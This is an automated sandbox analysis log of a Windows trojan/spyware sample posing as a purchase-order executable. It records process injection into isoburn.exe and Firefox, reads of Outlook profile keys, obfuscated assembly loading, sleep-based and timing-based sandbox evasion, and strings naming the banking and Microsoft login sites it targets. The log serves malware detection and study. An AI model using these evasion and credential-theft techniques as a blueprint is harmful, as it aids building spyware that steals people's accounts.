            Source: C:\Windows\SysWOW64\isoburn.exeProcess Stats: CPU usage > 49%
            Source: PO_CCTEB77.exe, 00000000.00000002.2048537994.0000000007CC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO_CCTEB77.exe
            Source: PO_CCTEB77.exe, 00000000.00000002.2045004163.000000000152E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO_CCTEB77.exe
            Source: PO_CCTEB77.exe, 00000000.00000000.2023679936.0000000000E98000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexoUr.exe2 vs PO_CCTEB77.exe
            Source: PO_CCTEB77.exe, 00000003.00000002.2154745222.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs PO_CCTEB77.exe
            Source: PO_CCTEB77.exe, 00000003.00000002.2155052437.00000000018BD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO_CCTEB77.exe
            Source: PO_CCTEB77.exeBinary or memory string: OriginalFilenamexoUr.exe2 vs PO_CCTEB77.exe
            Source: PO_CCTEB77.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: PO_CCTEB77.exeReversingLabs: Detection: 70%
            Source: PO_CCTEB77.exeVirustotal: Detection: 66%
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\PO_CCTEB77.exe C:\Users\user\Desktop\PO_CCTEB77.exe
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeProcess created: C:\Users\user\Desktop\PO_CCTEB77.exe C:\Users\user\Desktop\PO_CCTEB77.exe
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exeProcess created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exe
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_CCTEB77.exe.log
            Source: C:\Windows\SysWOW64\isoburn.exeFile created: C:\Users\user\AppData\Local\Temp\7e327r58
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/14
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, JoGCmiYYfOfQ8BcErn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, ukVSDQTdm2TNByUUwo.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, ukVSDQTdm2TNByUUwo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, ukVSDQTdm2TNByUUwo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, ukVSDQTdm2TNByUUwo.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, ukVSDQTdm2TNByUUwo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, ukVSDQTdm2TNByUUwo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, JoGCmiYYfOfQ8BcErn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: PO_CCTEB77.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: PO_CCTEB77.exeStatic file information: File size 1154048 > 1048576
            Source: PO_CCTEB77.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: PO_CCTEB77.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: PO_CCTEB77.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: firefox.pdbP source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2368356075.000000000844A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdb source: PO_CCTEB77.exe, 00000003.00000002.2154745222.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000002.4474515197.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: PO_CCTEB77.exe, 00000003.00000002.2154745222.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000002.4474515197.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000000.2077705276.0000000000BDE000.00000002.00000001.01000000.0000000D.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4474211062.0000000000BDE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_CCTEB77.exe, 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2156691093.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2154766470.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO_CCTEB77.exe, PO_CCTEB77.exe, 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000005.00000003.2156691093.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2154766470.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: xoUr.pdbSHA256 source: PO_CCTEB77.exe
            Source: Binary string: firefox.pdb source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2368356075.000000000844A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xoUr.pdb source: PO_CCTEB77.exe

            Data Obfuscation

            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, ukVSDQTdm2TNByUUwo.cs .Net Code: u537T54O2O System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_CCTEB77.exe.3221438.1.raw.unpack, -Module-.cs .Net Code: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_CCTEB77.exe.3221438.1.raw.unpack, wA.cs .Net Code: _202C_206C_202E_202C_200D_200D_200F_200D_202D_202C_206F_202A_206B_202D_202D_202D_200C_206E_206E_200B_200B_202D_200C_200F_202D_206A_202A_206A_200C_202A_200B_202C_206D_202C_202E_206E_200B_206D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_CCTEB77.exe.86f0000.10.raw.unpack, -Module-.cs .Net Code: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_CCTEB77.exe.86f0000.10.raw.unpack, wA.cs .Net Code: _202C_206C_202E_202C_200D_200D_200F_200D_202D_202C_206F_202A_206B_202D_202D_202D_200C_206E_206E_200B_200B_202D_200C_200F_202D_206A_202A_206A_200C_202A_200B_202C_206D_202C_202E_206E_200B_206D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_CCTEB77.exe.7cc0000.9.raw.unpack, ukVSDQTdm2TNByUUwo.cs .Net Code: u537T54O2O System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 0_2_0652C358 push es; ret 0_2_0652C370
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 0_2_08345191 push DC0654D5h; retf 0_2_0834519D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 0_2_08345390 push eax; retf 0_2_0834539D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 0_2_0834F71B push esp; iretd 0_2_0834F71E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_0042B882 push eax; ret 3_2_0042B884
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_00401887 push ebp; retf 3_2_00401889
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_0040509B push FFFFFFF5h; ret 3_2_0040509F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_0040D1DC pushad ; retf 3_2_0040D1E9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_004049AE push ebp; retf 3_2_004049B0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_00401A15 push esp; retf 3_2_00401A2F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_004032D0 push eax; ret 3_2_004032D2
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_00413AD2 push ebp; retf 3_2_00413AD5
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_00401AF6 push ebp; iretd 3_2_00401AFA
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_00407C3E push ecx; ret 3_2_00407C51
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_0040CD3A push edx; ret 3_2_0040CD3B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_00404DF4 push ebp; retf 3_2_00404DF8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_00429603 push edi; ret 3_2_0042960C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_0041AE3A push ebp; retf 3_2_0041AE3B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_0040175B push ebp; retf 3_2_00401774
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_017C09AD push ecx; mov dword ptr [esp], ecx 3_2_017C09B6
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 5_2_050A09AD push ecx; mov dword ptr [esp], ecx 5_2_050A09B6
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 5_2_0302632C push edi; ret 5_2_03026339
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 5_2_03026330 push edi; ret 5_2_03026339
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 5_2_03022373 pushad ; retf 5_2_03022376
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 5_2_0300E71F push ebp; ret 5_2_0300E735
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 5_2_0300E760 push ebp; ret 5_2_0300E735
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 5_2_0300E760 push ecx; ret 5_2_0300E78D
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 5_2_030107FF push ebp; retf 5_2_03010802
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 5_2_030285AF push eax; ret 5_2_030285B1
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 5_2_03022BA7 push cs; retf 5_2_03022BB1
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 5_2_0300496B push ecx; ret 5_2_0300497E
            Source: initial sample Static PE information: section name: .text entropy: 7.829988304712993
            Source: 0.2.PO_CCTEB77.exe.4de9e10.6.raw.unpack, XesiRELVHNOhhrfVEZ.cs High entropy of concatenated method names: 'Got0LM1y6u', 'ql50sh7ICo', 'PXq08E7fRT', 'mNA0ifJFpv', 'xrh05ZyX1Z', 'IJ5038ORWv', 'X1O0IswAgN', 'jaU0MAHUqV', 'BsJ0NgmL6s', 'SlQ0pQZFKG'
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\isoburn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: PO_CCTEB77.exe PID: 5628, type: MEMORYSTR
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -240000s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -239874s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -239765s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -239656s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -239546s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -239437s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -239328s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -239215s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -239107s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -238983s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -238874s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -238765s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -238626s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -238500s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -238390s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 4788 Thread sleep time: -238281s >= -30000s
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe TID: 3716 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 320 Thread sleep count: 1837 > 30
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 320 Thread sleep time: -3674000s >= -30000s
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 320 Thread sleep count: 8131 > 30
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 320 Thread sleep time: -16262000s >= -30000s
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe TID: 3652 Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe TID: 3652 Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe TID: 3652 Thread sleep time: -54000s >= -30000s
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe TID: 3652 Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe TID: 3652 Thread sleep time: -38000s >= -30000s
            Source: C:\Windows\SysWOW64\isoburn.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_0180096E rdtsc 3_2_0180096E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 240000
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 239874
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 239765
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 239656
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 239546
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 239437
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 239328
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 239215
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 239107
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 238983
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 238874
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 238765
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 238626
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 238500
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 238390
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 238281
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Window / User API: threadDelayed 637
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Window / User API: threadDelayed 2274
            Source: C:\Windows\SysWOW64\isoburn.exe Window / User API: threadDelayed 1837
            Source: C:\Windows\SysWOW64\isoburn.exe Window / User API: threadDelayed 8131
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe API coverage: 1.4 %
            Source: C:\Windows\SysWOW64\isoburn.exe API coverage: 2.9 %
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\isoburn.exe Code function: 5_2_0301C280 FindFirstFileW,FindNextFileW,FindClose, 5_2_0301C280
            Source: 7e327r58.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 7e327r58.5.dr Binary or memory string: discord.comVMware20,11696428655f
            Source: 7e327r58.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 7e327r58.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 7e327r58.5.dr Binary or memory string: global block list test formVMware20,11696428655
            Source: 7e327r58.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4474473840.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
            Source: 7e327r58.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 7e327r58.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 7e327r58.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 7e327r58.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 7e327r58.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 7e327r58.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 7e327r58.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 7e327r58.5.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 7e327r58.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: isoburn.exe, 00000005.00000002.4474142632.00000000031C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 7e327r58.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 7e327r58.5.dr Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: 7e327r58.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 7e327r58.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 7e327r58.5.dr Binary or memory string: AMC password management pageVMware20,11696428655
            Source: 7e327r58.5.dr Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: 7e327r58.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 7e327r58.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 7e327r58.5.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 7e327r58.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 7e327r58.5.dr Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: 7e327r58.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 7e327r58.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 7e327r58.5.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 7e327r58.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 7e327r58.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe Code function: 3_2_0180096E rdtsc 3_2_0180096E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F8402 mov eax, dword ptr fs:[00000030h]3_2_017F8402
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C04E5 mov ecx, dword ptr fs:[00000030h]3_2_017C04E5
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846420 mov eax, dword ptr fs:[00000030h]3_2_01846420
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F44B0 mov ecx, dword ptr fs:[00000030h]3_2_017F44B0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C64AB mov eax, dword ptr fs:[00000030h]3_2_017C64AB
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184C460 mov ecx, dword ptr fs:[00000030h]3_2_0184C460
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186678E mov eax, dword ptr fs:[00000030h]3_2_0186678E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8770 mov eax, dword ptr fs:[00000030h]3_2_017C8770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0770 mov eax, dword ptr fs:[00000030h]3_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0750 mov eax, dword ptr fs:[00000030h]3_2_017C0750
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F674D mov esi, dword ptr fs:[00000030h]3_2_017F674D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F674D mov eax, dword ptr fs:[00000030h]3_2_017F674D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F674D mov eax, dword ptr fs:[00000030h]3_2_017F674D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F273C mov eax, dword ptr fs:[00000030h]3_2_017F273C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F273C mov ecx, dword ptr fs:[00000030h]3_2_017F273C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F273C mov eax, dword ptr fs:[00000030h]3_2_017F273C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018407C3 mov eax, dword ptr fs:[00000030h]3_2_018407C3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FC720 mov eax, dword ptr fs:[00000030h]3_2_017FC720
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FC720 mov eax, dword ptr fs:[00000030h]3_2_017FC720
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184E7E1 mov eax, dword ptr fs:[00000030h]3_2_0184E7E1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0710 mov eax, dword ptr fs:[00000030h]3_2_017C0710
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F0710 mov eax, dword ptr fs:[00000030h]3_2_017F0710
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FC700 mov eax, dword ptr fs:[00000030h]3_2_017FC700
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C47FB mov eax, dword ptr fs:[00000030h]3_2_017C47FB
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C47FB mov eax, dword ptr fs:[00000030h]3_2_017C47FB
